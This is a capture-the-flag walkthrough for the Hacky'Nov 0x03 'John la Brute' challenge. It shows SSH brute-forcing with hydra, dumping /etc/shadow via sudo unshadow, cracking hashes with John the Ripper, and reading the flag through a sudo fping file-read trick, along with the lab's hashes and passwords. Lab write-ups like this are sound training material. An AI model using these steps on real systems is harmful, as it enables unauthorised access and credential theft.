/Cybersecurity/ /Hacky'Nov 0x03/ /PrivEsc/ /Bruteforce/

HN0x03 | John la Brute

• HN0x03 | 🩸 John la Brute
  • Goal
  • Walkthrough

HN0x03 | 🩸 John la Brute

This challenge is a part of the Hacky’Nov 0x03 CTF.

Goal

Find a way to connect to the machine and escalate your privileges to root to read the flag.

Walkthrough

The only thing we know is that we should be able to connect to the machine with the armi user. The name of the challenge is clearly a reference to John The Ripper, a famous password cracker. So, let’s try to bruteforce the login using hydra and the rockyou.txt wordlist.

$ hydra -l armi -P /usr/share/wordlists/rockyou.txt ssh://ctfcafe.hackynov.fr:30008 -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://ctfcafe.hackynov.fr:30008/
[30008][ssh] host: ctfcafe.hackynov.fr   login: armi   password: chocolate
1 of 1 target successfully completed, 1 valid password found

Got it, the password is really weak and quickly found. Let’s connect to the machine and check the sudo permissions:

armi@5e840f4577b9:~$ sudo -l
Matching Defaults entries for armi on 5e840f4577b9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User armi may run the following commands on 5e840f4577b9:
    (ALL) NOPASSWD: /usr/sbin/john
    (ALL) NOPASSWD: /usr/sbin/unshadow

We have access to john and unshadow, we probably have to crack some passwords. Let’s check the /etc/shadow file:

armi@5e840f4577b9:~$ sudo /usr/sbin/unshadow /etc/passwd /etc/shadow
root:*:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:*:42:65534::/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:!*:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:!*:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:!:100:101::/nonexistent:/usr/sbin/nologin
sshd:!:101:65534::/run/sshd:/usr/sbin/nologin
prince:$1$71KuAfWl$Il.C8TKOMXU/JmNnaG6Yq.:1000:1000:,,,:/home/prince:/bin/bash
armi:$1$m8N4.9F1$3sh6Qtegg9QzJVj0bM6Wy0:1001:1001:,,,:/home/armi:/bin/bash

No other user than prince and armi has a password hash. Let’s try to crack prince’s password:

# Save the unshadowed file to /tmp/unshadowed

┌──(nhqml㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/unshadowed
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
chocolate        (armi)
1234a            (prince)
2g 0:00:00:00 DONE (2024-06-04 09:56) 3.076g/s 83889p/s 84480c/s 84480C/s SHORTY13..022186
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(nhqml㉿kali)-[~]
└─$ john --show /tmp/unshadowed
prince:1234a:1000:1000:,,,:/home/prince:/bin/bash
armi:chocolate:1001:1001:,,,:/home/armi:/bin/bash

2 password hashes cracked, 0 left

We got the password of prince, let’s login with this user and check what we can do:

prince@5e840f4577b9:~$ sudo -l
Matching Defaults entries for prince on 5e840f4577b9:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User prince may run the following commands on 5e840f4577b9:
    (ALL) NOPASSWD: /usr/bin/fping

We can run fping, allowing us to read the flag:

prince@5e840f4577b9:~$ sudo fping -f flag.txt
HN0x03{Ireallyl0veCh0c0late}: Name or service not known